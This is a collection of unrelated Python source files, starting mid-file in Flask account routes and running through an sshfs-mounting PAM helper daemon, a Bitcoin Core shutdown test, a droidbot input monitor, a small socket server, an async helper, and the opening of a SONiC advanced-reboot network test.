confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
except:
flash('The confirmation link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
db.session.add(user)
db.session.commit()
flash('Thank you for confirming your email address!', 'success')
return redirect(url_for('recipes.public_recipes'))
@users_blueprint.route('/reset', methods=["GET", "POST"])
def reset():
form = EmailForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=form.email.data).first_or_404()
except:
flash('Invalid email address!', 'error')
return render_template('password_reset_email.html', form=form)
if user.email_confirmed:
send_password_reset_email(user.email)
flash('Please check your email for a password reset link.', 'success')
else:
flash('Your email address must be confirmed before attempting a password reset.', 'error')
return redirect(url_for('users.login'))
return render_template('password_reset_email.html', form=form)
@users_blueprint.route('/reset/<token>', methods=["GET", "POST"])
def reset_with_token(token):
try:
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = password_reset_serializer.loads(token, salt='password-reset-salt', max_age=3600)
except:
flash('The password reset link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
form = PasswordForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=email).first_or_404()
except:
flash('Invalid email address!', 'error')
return redirect(url_for('users.login'))
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('users.login'))
return render_template('reset_password_with_token.html', form=form, token=token)
@users_blueprint.route('/user_profile')
@login_required
def user_profile():
return render_template('user_profile.html')
@users_blueprint.route('/email_change', methods=["GET", "POST"])
@login_required
def user_email_change():
form = EmailForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
user_check = User.query.filter_by(email=form.email.data).first()
if user_check is None:
user = current_user
user.email = form.email.data
user.email_confirmed = False
user.email_confirmed_on = None
user.email_confirmation_sent_on = datetime.now()
db.session.add(user)
db.session.commit()
send_confirmation_email(user.email)
flash('Email changed! Please confirm your new email address (link sent to new email).', 'success')
return redirect(url_for('users.user_profile'))
else:
flash('Sorry, that email already exists!', 'error')
except IntegrityError:
flash('Error! That email already exists!', 'error')
return render_template('email_change.html', form=form)
@users_blueprint.route('/password_change', methods=["GET", "POST"])
@login_required
def user_password_change():
form = PasswordForm()
if request.method == 'POST':
if form.validate_on_submit():
user = current_user
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Password has been updated!', 'success')
return redirect(url_for('users.user_profile'))
return render_template('password_change.html', form=form)
@users_blueprint.route('/resend_confirmation')
@login_required
def resend_email_confirmation():
try:
send_confirmation_email(current_user.email)
flash('Email sent to confirm your email address. Please check your email!', 'success')
except IntegrityError:
flash('Error! Unable to send email to confirm your email address.', 'error')
return redirect(url_for('users.user_profile'))
@users_blueprint.route('/admin_view_users')
@login_required
def admin_view_users():
if current_user.role != 'admin':
abort(403)
users = User.query.order_by(User.id).all()
return render_template('admin_view_users.html', users=users)
@users_blueprint.route('/admin/delete/user/<user_id>')
@login_required
def admin_delete_user(user_id):
if current_user.role != 'admin':
abort(403)
user = User.query.filter_by(id=user_id).first_or_404()
db.session.delete(user)
db.session.commit()
flash('User #{} was deleted.'.format(user_id), 'success')
return redirect(url_for('users.admin_view_users'))
@users_blueprint.route('/admin/edit/user/<user_id>', methods=["GET", "POST"])
@login_required
def admin_edit_user(user_id):
if current_user.role != 'admin':
abort(403)
form = EditUserForm()
user = User.query.filter_by(id=user_id).first_or_404()
if request.method == 'POST':
if form.validate_on_submit():
user.import_form_data(form)
db.session.add(user)
db.session.commit()
flash('User #{} was updated to email address: {}'.format(user.id, user.email), 'success')
return redirect(url_for('users.admin_view_users'))
return render_template('admin_edit_user.html', form=form, user=user)
|
daemon.py
|
import os
import sys
import pwd
import subprocess
import threading
import json
import socket
import pipes
import time
ENVIRON = {'PATH': '/bin:/usr/bin'}
config = json.load(open('config.json'))
open_session_lock = threading.Lock()
def auth_helper(username, token):
cmd = ['ssh',
'-o', 'StrictHostKeyChecking=no',
'-o', 'PubkeyAuthentication=no',
'-l' + username,
config['ssh_host'], 'true']
return run_ssh(cmd, token)
def mount_helper(username, token, pw):
cmd = ['sshfs', '-f',
'-o', 'reconnect,workaround=all',
'-o', 'nonempty,allow_other',
'-o', 'compression=yes',
'-o', 'uid=%d,gid=%d' % (
pw.pw_uid, pw.pw_gid),
'%s@%s:' % (username, config['ssh_host']),
pw.pw_dir]
return run_ssh(cmd, token)
def run_ssh(cmd, token):
ipipe, opipe = os.pipe()
cmd = ['sshpass', '-d%d' % ipipe, '--'] + cmd
proc = subprocess.Popen(cmd,
env=ENVIRON,
close_fds=False,
stdout=sys.stderr)
os.write(opipe, token + '\n')
os.close(opipe)
return proc.wait()
def open_session(user, auth_token):
pw = pwd.getpwnam(user)
path = pw.pw_dir
try:
os.mkdir(path)
except OSError:
pass
else:
os.chown(path, pw.pw_uid, pw.pw_gid)
if not ismount(path):
f = lambda: mount_helper(user, auth_token, pw)
threading.Thread(target=f).start()
wait_for_mount(path)
subprocess.check_call([
'mount', '-t', 'tmpfs', 'cache',
path + '/.cache'
])
return 0
else:
return 0
def wait_for_mount(path, timeout=5):
for i in xrange(10 * timeout):
if ismount(path):
return
time.sleep(0.1)
raise IOError('not mounted')
def ismount(path):
for line in open('/proc/mounts'):
if line.split()[1] == path:
return True
def auth(user, auth_token):
return auth_helper(user, auth_token)
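# Each client connection sends a single JSON-encoded line of the form [method, kwargs],
# e.g. (illustrative values): ["auth", {"user": "alice", "auth_token": "secret"}].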
def handle(sock):
f = sock.makefile('r+')
method, args = json.loads(f.readline())
code = -1
if method == 'open_session':
with open_session_lock:
code = open_session(**args)
elif method == 'auth':
code = auth(**args)
print 'response', method, code
f.write(str(code) + '\n')
def loop():
ADDR = '/var/run/pam_ssh.sock'
if os.path.exists(ADDR):
os.remove(ADDR)
sock = socket.socket(socket.AF_UNIX)
sock.bind(ADDR)
os.chmod(ADDR, 0o700)
sock.listen(2)
while True:
child, addr = sock.accept()
threading.Thread(target=handle, args=[child]).start()
del child
if __name__ == '__main__':
loop()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test weid shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
Thread(target=test_long_call, args=(node,)).start()
# wait 1 second to ensure event loop waits for current connections to close
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
user_input_monitor.py
|
import subprocess
import logging
from .adapter import Adapter
class UserInputMonitor(Adapter):
"""
A connection with the target device through `getevent`.
`getevent` is able to get raw user input from device.
"""
def __init__(self, device=None):
"""
initialize connection
:param device: a Device instance
"""
self.logger = logging.getLogger(self.__class__.__name__)
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.connected = False
self.process = None
if device.output_dir is None:
self.out_file = None
else:
self.out_file = "%s/user_input.txt" % device.output_dir
def connect(self):
self.process = subprocess.Popen(["adb", "-s", self.device.serial, "shell", "getevent", "-lt"],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
import threading
listen_thread = threading.Thread(target=self.handle_output)
listen_thread.start()
def disconnect(self):
self.connected = False
if self.process is not None:
self.process.terminate()
def check_connectivity(self):
return self.connected
def handle_output(self):
self.connected = True
f = None
if self.out_file is not None:
f = open(self.out_file, 'w')
while self.connected:
if self.process is None:
continue
line = self.process.stdout.readline()
if not isinstance(line, str):
line = line.decode()
self.parse_line(line)
if f is not None:
f.write(line)
if f is not None:
f.close()
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def parse_line(self, getevent_line):
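        # Stub: subclasses may override this to parse a raw `getevent -lt` line,
        # e.g. (illustrative, format varies by device):
        # "[ 12345.678] /dev/input/event1: EV_ABS ABS_MT_POSITION_X 000001f4"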
pass
|
server.py
|
#!/usr/bin/env python
import socket #import socket module
import time
import threading
import cv2
import base64
#camera = cv2.VideoCapture(0)
def sendData(client):
while(True):
#grabbed, frame = camera.read()
#frame = cv2.resize(frame, (640, 480))
#encoded, buffer = cv2.imencode('.jpg', frame)
#jpg_as_text = base64.b64encode(buffer)
str = "hello hello hello hello hello"
#client.send(jpg_as_text.encode())
client.send(str)
#time.sleep(0.005)
cs = socket.socket() #create a socket object
cs.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
cport = 12397 # Reserve a port for your service
cs.bind(('', cport)) #Bind to the port
cs.listen(5) #Wait for the client connection
c,addr = cs.accept() #Establish a connection
sendThread = threading.Thread(target=sendData, args=(c,))
sendThread.start()
cs.close()
|
async_calls.py
|
# Copyright 2019-2020 Stanislav Pidhorskyi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import threading
__all__ = ['async_func']
class AsyncCall(object):
def __init__(self, fnc, callback=None):
self.callable = fnc
self.callback = callback
self.result = None
def __call__(self, *args, **kwargs):
self.thread = threading.Thread(target=self.run, name=self.callable.__name__, args=args, kwargs=kwargs)
self.thread.start()
return self
def wait(self, timeout=None):
self.thread.join(timeout)
        if self.thread.is_alive():
raise TimeoutError
else:
return self.result
def run(self, *args, **kwargs):
self.result = self.callable(*args, **kwargs)
if self.callback:
self.callback(self.result)
class AsyncMethod(object):
def __init__(self, fnc, callback=None):
self.callable = fnc
self.callback = callback
def __call__(self, *args, **kwargs):
return AsyncCall(self.callable, self.callback)(*args, **kwargs)
def async_func(fnc=None, callback=None):
if fnc is None:
def add_async_callback(f):
return AsyncMethod(f, callback)
return add_async_callback
else:
return AsyncMethod(fnc, callback)
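# Example usage (illustrative; function and argument names are hypothetical):
#
#     @async_func
#     def download(url):
#         ...
#
#     call = download("http://example.com")   # returns immediately, work runs on a thread
#     result = call.wait(timeout=10)           # join the worker thread, get the result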
|
advanced-reboot.py
|
#
# ptf --test-dir ptftests fast-reboot --qlen=1000 --platform remote -t 'verbose=True;dut_username="admin";dut_hostname="10.0.0.243";reboot_limit_in_seconds=30;portchannel_ports_file="/tmp/portchannel_interfaces.json";vlan_ports_file="/tmp/vlan_interfaces.json";ports_file="/tmp/ports.json";dut_mac="4c:76:25:f5:48:80";default_ip_range="192.168.0.0/16";vlan_ip_range="{\"Vlan100\": \"172.0.0.0/22\"}";arista_vms="[\"10.0.0.200\",\"10.0.0.201\",\"10.0.0.202\",\"10.0.0.203\"]"' --platform-dir ptftests --disable-vxlan --disable-geneve --disable-erspan --disable-mpls --disable-nvgre
#
#
# This test checks that the DUT is able to perform the FastReboot procedure
#
# This test assumes that fast-reboot/warm-reboot is initiated by running the /usr/bin/{fast,warm}-reboot command.
#
# The test uses "pings". The "pings" are packets which are sent through the dataplane in two directions
# 1. From one of the vlan interfaces to a T1 device. The source IP, source interface, and destination IP are chosen randomly from valid choices. The number of packets is 100.
# 2. From all portchannel ports to all vlan ports. The source IP, source interface, and destination IP are chosen sequentially from valid choices.
# Currently we have 500 distinct destination vlan addresses. Our target is to have 1000 of them.
#
# The test sequence is the following:
# 1. Check that the DUT is stable. That means that "pings" work in both directions: from T1 to servers and from servers to T1.
# 2. If the DUT is stable, the test starts continuously pinging the DUT in both directions.
# 3. The test runs '/usr/bin/{fast,warm}-reboot' on the DUT remotely. The ssh key is supposed to be uploaded by ansible before the test.
# 4. As soon as it sees that pings start failing in one of the directions, the test registers the start of a dataplane disruption.
# 5. As soon as the test sees that pings work for the DUT in both directions again, it registers the end of the dataplane disruption.
# 6. If the length of the disruption is less than 30 seconds (if not redefined by parameter) - the test passes.
# 7. If there are any drops while the control plane is down - the test fails.
# 8. When the test starts the reboot procedure it connects to all VMs (which emulate T1) and starts fetching the status of BGP and LACP:
# LACP is supposed to go down exactly once; if not - the test fails.
# If the default value of the BGP graceful restart timeout is less than 120 seconds - the test fails.
# If BGP graceful restart is not enabled on the DUT - the test fails.
# If the BGP graceful restart timeout is almost exceeded (less than 15 seconds left) - the test fails.
# If BGP routes disappear more than once - the test fails.
#
# The test expects that you are running it with the link state propagation helper.
# That helper propagates the link state from the fanout switch port to the corresponding VM port.
#
import ptf
from ptf.base_tests import BaseTest
from ptf import config
import ptf.testutils as testutils
from ptf.testutils import *
from ptf.dataplane import match_exp_pkt
import datetime
import time
import subprocess
from ptf.mask import Mask
import socket
import ptf.packet as scapy
import thread
import threading
from multiprocessing.pool import ThreadPool, TimeoutError
import os
import signal
import random
import struct
import socket
from pprint import pprint
from fcntl import ioctl
import sys
import json
import re
from collections import defaultdict
import json
import Queue
import pickle
from operator import itemgetter
import scapy.all as scapyall
import itertools
from device_connection import DeviceConnection
import multiprocessing
import ast
from arista import Arista
import sad_path as sp
class StateMachine():
def __init__(self, init_state='init'):
self.state_lock = threading.RLock()
self.state_time = {} # Recording last time when entering a state
self.state = None
self.flooding = False
self.set(init_state)
def set(self, state):
with self.state_lock:
self.state = state
self.state_time[state] = datetime.datetime.now()
def get(self):
with self.state_lock:
cur_state = self.state
return cur_state
def get_state_time(self, state):
with self.state_lock:
time = self.state_time[state]
return time
def set_flooding(self, flooding):
with self.state_lock:
self.flooding = flooding
def is_flooding(self):
with self.state_lock:
flooding = self.flooding
return flooding
class ReloadTest(BaseTest):
TIMEOUT = 0.5
PKT_TOUT = 1
VLAN_BASE_MAC_PATTERN = '72060001{:04}'
LAG_BASE_MAC_PATTERN = '5c010203{:04}'
SOCKET_RECV_BUFFER_SIZE = 10 * 1024 * 1024
def __init__(self):
BaseTest.__init__(self)
self.fails = {}
self.info = {}
self.cli_info = {}
self.logs_info = {}
self.lacp_pdu_times = {}
self.log_lock = threading.RLock()
self.vm_handle = None
self.sad_handle = None
self.process_id = str(os.getpid())
self.test_params = testutils.test_params_get()
self.check_param('verbose', False, required=False)
self.check_param('dut_username', '', required=True)
self.check_param('dut_password', '', required=True)
self.check_param('dut_hostname', '', required=True)
self.check_param('reboot_limit_in_seconds', 30, required=False)
self.check_param('reboot_type', 'fast-reboot', required=False)
self.check_param('graceful_limit', 240, required=False)
self.check_param('portchannel_ports_file', '', required=True)
self.check_param('vlan_ports_file', '', required=True)
self.check_param('ports_file', '', required=True)
self.check_param('dut_mac', '', required=True)
self.check_param('default_ip_range', '', required=True)
self.check_param('vlan_ip_range', '', required=True)
self.check_param('lo_prefix', '10.1.0.32/32', required=False)
self.check_param('lo_v6_prefix', 'fc00:1::/64', required=False)
self.check_param('arista_vms', [], required=True)
self.check_param('min_bgp_gr_timeout', 15, required=False)
self.check_param('warm_up_timeout_secs', 300, required=False)
self.check_param('dut_stabilize_secs', 30, required=False)
self.check_param('preboot_files', None, required=False)
self.check_param('preboot_oper', None, required=False) # preboot sad path to inject before warm-reboot
self.check_param('inboot_oper', None, required=False) # sad path to inject during warm-reboot
self.check_param('nexthop_ips', [], required=False) # nexthops for the routes that will be added during warm-reboot
self.check_param('allow_vlan_flooding', False, required=False)
self.check_param('allow_mac_jumping', False, required=False)
self.check_param('sniff_time_incr', 300, required=False)
self.check_param('vnet', False, required=False)
self.check_param('vnet_pkts', None, required=False)
self.check_param('target_version', '', required=False)
self.check_param('bgp_v4_v6_time_diff', 40, required=False)
self.check_param('asic_type', '', required=False)
self.check_param('logfile_suffix', None, required=False)
if not self.test_params['preboot_oper'] or self.test_params['preboot_oper'] == 'None':
self.test_params['preboot_oper'] = None
if not self.test_params['inboot_oper'] or self.test_params['inboot_oper'] == 'None':
self.test_params['inboot_oper'] = None
# initialize sad oper
if self.test_params['preboot_oper']:
self.sad_oper = self.test_params['preboot_oper']
else:
self.sad_oper = self.test_params['inboot_oper']
if self.test_params['logfile_suffix']:
self.logfile_suffix = self.test_params['logfile_suffix']
else:
self.logfile_suffix = self.sad_oper
if "warm-reboot" in self.test_params['reboot_type']:
reboot_log_prefix = "warm-reboot"
else:
reboot_log_prefix = self.test_params['reboot_type']
if self.logfile_suffix:
self.log_file_name = '/tmp/%s-%s.log' % (reboot_log_prefix, self.logfile_suffix)
self.report_file_name = '/tmp/%s-%s-report.json' % (reboot_log_prefix, self.logfile_suffix)
else:
self.log_file_name = '/tmp/%s.log' % reboot_log_prefix
self.report_file_name = '/tmp/%s-report.json' % reboot_log_prefix
self.report = dict()
self.log_fp = open(self.log_file_name, 'w')
self.packets_list = []
self.vnet = self.test_params['vnet']
if (self.vnet):
self.packets_list = json.load(open(self.test_params['vnet_pkts']))
# a flag whether to populate FDB by sending traffic from simulated servers
# usually ARP responder will make switch populate its FDB table, but Mellanox on 201803 has
# no L3 ARP support, so this flag is used to W/A this issue
self.setup_fdb_before_test = self.test_params.get('setup_fdb_before_test', False)
# Default settings
self.ping_dut_pkts = 10
self.arp_ping_pkts = 1
self.nr_pc_pkts = 100
self.nr_tests = 3
self.reboot_delay = 10
self.task_timeout = 300 # Wait up to 5 minutes for tasks to complete
self.max_nr_vl_pkts = 500 # FIXME: should be 1000.
# But ptf is not fast enough + swss is slow for FDB and ARP entries insertions
self.timeout_thr = None
        self.time_to_listen = 240.0 # Listen for more than 240 seconds; used in the sniff_in_background method.
# Inter-packet interval, to be used in send_in_background method.
# Improve this interval to gain more precision of disruptions.
self.send_interval = 0.0035
self.packets_to_send = min(int(self.time_to_listen / (self.send_interval + 0.0015)), 45000) # How many packets to be sent in send_in_background method
# Thread pool for background watching operations
self.pool = ThreadPool(processes=3)
# State watcher attributes
self.watching = False
self.cpu_state = StateMachine('init')
self.asic_state = StateMachine('init')
self.vlan_state = StateMachine('init')
self.vlan_lock = threading.RLock()
self.asic_state_time = {} # Recording last asic state entering time
self.asic_vlan_reach = [] # Recording asic vlan reachability
self.recording = False # Knob for recording asic_vlan_reach
# light_probe:
# True : when one direction probe fails, don't probe another.
# False: when one direction probe fails, continue probe another.
self.light_probe = False
        # We have two data plane traffic generators which are mutually exclusive:
        # one is the reachability_watcher thread,
        # the second is the fast send_in_background.
self.dataplane_io_lock = threading.Lock()
self.allow_vlan_flooding = bool(self.test_params['allow_vlan_flooding'])
self.dut_connection = DeviceConnection(
self.test_params['dut_hostname'],
self.test_params['dut_username'],
password=self.test_params['dut_password'],
alt_password=self.test_params.get('alt_password')
)
# Check if platform type is kvm
stdout, stderr, return_code = self.dut_connection.execCommand("show platform summary | grep Platform | awk '{print $2}'")
platform_type = str(stdout[0]).replace('\n', '')
if platform_type == 'x86_64-kvm_x86_64-r0':
self.kvm_test = True
else:
self.kvm_test = False
return
def read_json(self, name):
with open(self.test_params[name]) as fp:
content = json.load(fp)
return content
def read_port_indices(self):
port_indices = self.read_json('ports_file')
return port_indices
def read_vlan_portchannel_ports(self):
portchannel_content = self.read_json('portchannel_ports_file')
portchannel_names = [pc['name'] for pc in portchannel_content.values()]
vlan_content = self.read_json('vlan_ports_file')
ports_per_vlan = dict()
pc_in_vlan = []
for vlan in self.vlan_ip_range.keys():
ports_in_vlan = []
for ifname in vlan_content[vlan]['members']:
if ifname in portchannel_names:
pc_in_vlan.append(ifname)
else:
ports_in_vlan.append(self.port_indices[ifname])
ports_per_vlan[vlan] = ports_in_vlan
active_portchannels = list()
for neighbor_info in list(self.vm_dut_map.values()):
active_portchannels.append(neighbor_info["dut_portchannel"])
pc_ifaces = []
for pc in portchannel_content.values():
if not pc['name'] in pc_in_vlan and pc['name'] in active_portchannels:
pc_ifaces.extend([self.port_indices[member] for member in pc['members']])
return ports_per_vlan, pc_ifaces
def check_param(self, param, default, required = False):
if param not in self.test_params:
if required:
raise Exception("Test parameter '%s' is required" % param)
self.test_params[param] = default
def random_ip(self, ip):
net_addr, mask = ip.split('/')
n_hosts = 2**(32 - int(mask))
random_host = random.randint(2, n_hosts - 2)
return self.host_ip(ip, random_host)
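    # Illustrative example: host_ip("192.168.0.0/24", 5) -> "192.168.0.5"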
def host_ip(self, net_ip, host_number):
src_addr, mask = net_ip.split('/')
n_hosts = 2**(32 - int(mask))
if host_number > (n_hosts - 2):
raise Exception("host number %d is greater than number of hosts %d in the network %s" % (host_number, n_hosts - 2, net_ip))
src_addr_n = struct.unpack(">I", socket.inet_aton(src_addr))[0]
net_addr_n = src_addr_n & (2**32 - n_hosts)
host_addr_n = net_addr_n + host_number
host_ip = socket.inet_ntoa(struct.pack(">I", host_addr_n))
return host_ip
def random_port(self, ports):
return random.choice(ports)
def log(self, message, verbose=False):
current_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
with self.log_lock:
if (verbose and self.test_params['verbose']) or not verbose:
print "%s : %s" % (current_time, message)
self.log_fp.write("%s : %s\n" % (current_time, message))
self.log_fp.flush()
def timeout(self, func, seconds, message):
signal = multiprocessing.Event()
async_res = self.pool.apply_async(func, args=(signal,))
try:
res = async_res.get(timeout=seconds)
except Exception as err:
# TimeoutError and Exception's from func
# captured here
signal.set()
raise type(err)(message)
return res
def generate_vlan_servers(self):
vlan_host_map = defaultdict(dict)
self.vlan_host_ping_map = defaultdict(dict)
self.nr_vl_pkts = 0 # Number of packets from upper layer
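# vlan_host_map maps a PTF port index to a {host IP: MAC} dict of simulated servers;
# vlan_host_ping_map holds one extra host per VLAN member port, reserved for the control plane ping probes.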
for vlan, prefix in self.vlan_ip_range.items():
if not self.ports_per_vlan[vlan]:
continue
_, mask = prefix.split('/')
n_hosts = min(2**(32 - int(mask)) - 3, self.max_nr_vl_pkts)
for counter, i in enumerate(xrange(2, n_hosts + 2)):
mac = self.VLAN_BASE_MAC_PATTERN.format(counter)
port = self.ports_per_vlan[vlan][i % len(self.ports_per_vlan[vlan])]
addr = self.host_ip(prefix, i)
vlan_host_map[port][addr] = mac
for counter, i in enumerate(
xrange(n_hosts+2, n_hosts+2+len(self.ports_per_vlan[vlan])), start=n_hosts):
mac = self.VLAN_BASE_MAC_PATTERN.format(counter)
port = self.ports_per_vlan[vlan][i % len(self.ports_per_vlan[vlan])]
addr = self.host_ip(prefix, i)
self.vlan_host_ping_map[port][addr] = mac
self.nr_vl_pkts += n_hosts
return vlan_host_map
def generate_arp_responder_conf(self, vlan_host_map):
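# Build the arp_responder configuration: PTF interface name ("eth<port index>")
# mapped to the {IP: MAC} entries the arp_responder process should answer for.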
arp_responder_conf = {}
for port in vlan_host_map:
arp_responder_conf['eth{}'.format(port)] = {}
arp_responder_conf['eth{}'.format(port)].update(vlan_host_map[port])
arp_responder_conf['eth{}'.format(port)].update(self.vlan_host_ping_map[port])
return arp_responder_conf
def dump_arp_responder_config(self, dump):
# save data for arp_replay process
filename = "/tmp/from_t1.json" if self.logfile_suffix is None else "/tmp/from_t1_%s.json" % self.logfile_suffix
with open(filename, "w") as fp:
json.dump(dump, fp)
def get_peer_dev_info(self):
content = self.read_json('peer_dev_info')
for key in content.keys():
if 'ARISTA' in key:
self.vm_dut_map[key] = dict()
self.vm_dut_map[key]['mgmt_addr'] = content[key]['mgmt_addr']
# initialize all the port mapping
self.vm_dut_map[key]['dut_ports'] = []
self.vm_dut_map[key]['neigh_ports'] = []
self.vm_dut_map[key]['ptf_ports'] = []
def get_portchannel_info(self):
content = self.read_json('portchannel_ports_file')
for key in content.keys():
for member in content[key]['members']:
for vm_key in self.vm_dut_map.keys():
if member in self.vm_dut_map[vm_key]['dut_ports']:
self.vm_dut_map[vm_key]['dut_portchannel'] = str(key)
self.vm_dut_map[vm_key]['neigh_portchannel'] = 'Port-Channel1'
break
def get_neigh_port_info(self):
content = self.read_json('neigh_port_info')
for key in content.keys():
if content[key]['name'] in self.vm_dut_map.keys():
self.vm_dut_map[content[key]['name']]['dut_ports'].append(str(key))
self.vm_dut_map[content[key]['name']]['neigh_ports'].append(str(content[key]['port']))
self.vm_dut_map[content[key]['name']]['ptf_ports'].append(self.port_indices[key])
def build_peer_mapping(self):
'''
Builds a map of the form:
'ARISTA01T1': {
'mgmt_addr': ...,
'neigh_portchannel': ...,
'dut_portchannel': ...,
'neigh_ports': ...,
'dut_ports': ...,
'ptf_ports': ...,
}
'''
self.vm_dut_map = {}
for file in self.test_params['preboot_files'].split(','):
self.test_params[file] = '/tmp/' + file + '.json'
self.get_peer_dev_info()
self.get_neigh_port_info()
self.get_portchannel_info()
def build_vlan_if_port_mapping(self):
portchannel_content = self.read_json('portchannel_ports_file')
portchannel_names = [pc['name'] for pc in portchannel_content.values()]
vlan_content = self.read_json('vlan_ports_file')
vlan_if_port = []
for vlan in self.vlan_ip_range:
for ifname in vlan_content[vlan]['members']:
if ifname not in portchannel_names:
vlan_if_port.append((ifname, self.port_indices[ifname]))
return vlan_if_port
def populate_fail_info(self, fails):
for key in fails:
if key not in self.fails:
self.fails[key] = set()
self.fails[key] |= fails[key]
def get_sad_info(self):
'''
Prepares the message string to log when a sad_oper is defined. A sad oper can be a preboot or an inboot operation.
sad_oper can be represented in the following ways
eg. 'preboot_oper' - a single VM will be selected and preboot_oper will be applied to it
'neigh_bgp_down:2' - 2 VMs will be selected and preboot_oper will be applied to the selected 2 VMs
'neigh_lag_member_down:3:1' - this case is used for lag member down operation only. This indicates that
3 VMs will be selected and 1 of the lag members in the portchannel will be brought down
'inboot_oper' - represents a routing change during warm boot (add or del of multiple routes)
'routing_add:10' - adding 10 routes during warm boot
'''
msg = ''
if self.sad_oper:
msg = 'Sad oper: %s ' % self.sad_oper
if ':' in self.sad_oper:
oper_list = self.sad_oper.split(':')
msg = 'Sad oper: %s ' % oper_list[0] # extract the sad oper_type
if len(oper_list) > 2:
# extract the number of VMs and the number of LAG members. sad_oper is of the form oper:<number of VMs>:<number of LAG members>
msg += 'Number of sad path VMs: %s Lag member down in a portchannel: %s' % (oper_list[-2], oper_list[-1])
else:
# inboot oper
if 'routing' in self.sad_oper:
msg += 'Number of ip addresses: %s' % oper_list[-1]
else:
# extract the number of VMs. preboot_oper is of the form oper:<number of VMs>
msg += 'Number of sad path VMs: %s' % oper_list[-1]
return msg
def init_sad_oper(self):
if self.sad_oper:
self.log("Preboot/Inboot Operations:")
self.sad_handle = sp.SadTest(self.sad_oper, self.ssh_targets, self.portchannel_ports, self.vm_dut_map, self.test_params, self.vlan_ports, self.ports_per_vlan)
(self.ssh_targets, self.portchannel_ports, self.neigh_vm, self.vlan_ports, self.ports_per_vlan), (log_info, fails) = self.sad_handle.setup()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
if self.sad_oper:
log_info, fails = self.sad_handle.verify()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def do_inboot_oper(self):
'''
Add or del routes during boot
'''
if self.sad_oper and 'routing' in self.sad_oper:
self.log("Performing inboot operation")
log_info, fails = self.sad_handle.route_setup()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def check_inboot_sad_status(self):
if 'routing_add' in self.sad_oper:
self.log('Verify if new routes added during warm reboot are received')
else:
self.log('Verify that routes deleted during warm reboot are removed')
log_info, fails = self.sad_handle.verify(pre_check=False, inboot=True)
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def check_postboot_sad_status(self):
self.log("Postboot checks:")
log_info, fails = self.sad_handle.verify(pre_check=False, inboot=False)
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def sad_revert(self):
self.log("Revert to preboot state:")
log_info, fails = self.sad_handle.revert()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def setUp(self):
self.fails['dut'] = set()
self.port_indices = self.read_port_indices()
self.vlan_ip_range = ast.literal_eval(self.test_params['vlan_ip_range'])
self.build_peer_mapping()
self.ports_per_vlan, self.portchannel_ports = self.read_vlan_portchannel_ports()
self.vlan_ports = []
for ports in self.ports_per_vlan.values():
self.vlan_ports += ports
if self.sad_oper:
self.test_params['vlan_if_port'] = self.build_vlan_if_port_mapping()
self.default_ip_range = self.test_params['default_ip_range']
self.limit = datetime.timedelta(seconds=self.test_params['reboot_limit_in_seconds'])
self.reboot_type = self.test_params['reboot_type']
if self.reboot_type in ['soft-reboot', 'reboot']:
raise ValueError('Not supported reboot_type %s' % self.reboot_type)
self.dut_mac = self.test_params['dut_mac']
if self.kvm_test:
self.log("This test is for KVM platform")
# get VM info
if isinstance(self.test_params['arista_vms'], list):
arista_vms = self.test_params['arista_vms']
else:
arista_vms = self.test_params['arista_vms'][1:-1].split(",")
self.ssh_targets = []
for vm in arista_vms:
if (vm.startswith("'") or vm.startswith('"')) and (vm.endswith("'") or vm.endswith('"')):
self.ssh_targets.append(vm[1:-1])
else:
self.ssh_targets.append(vm)
self.log("Converted addresses VMs: %s" % str(self.ssh_targets))
self.init_sad_oper()
self.vlan_host_map = self.generate_vlan_servers()
arp_responder_conf = self.generate_arp_responder_conf(self.vlan_host_map)
self.dump_arp_responder_config(arp_responder_conf)
self.random_vlan = random.choice(self.vlan_ports)
self.from_server_src_port = self.random_vlan
self.from_server_src_addr = random.choice(self.vlan_host_map[self.random_vlan].keys())
self.from_server_src_mac = self.hex_to_mac(self.vlan_host_map[self.random_vlan][self.from_server_src_addr])
self.from_server_dst_addr = self.random_ip(self.test_params['default_ip_range'])
self.from_server_dst_ports = self.portchannel_ports
self.log("Test params:")
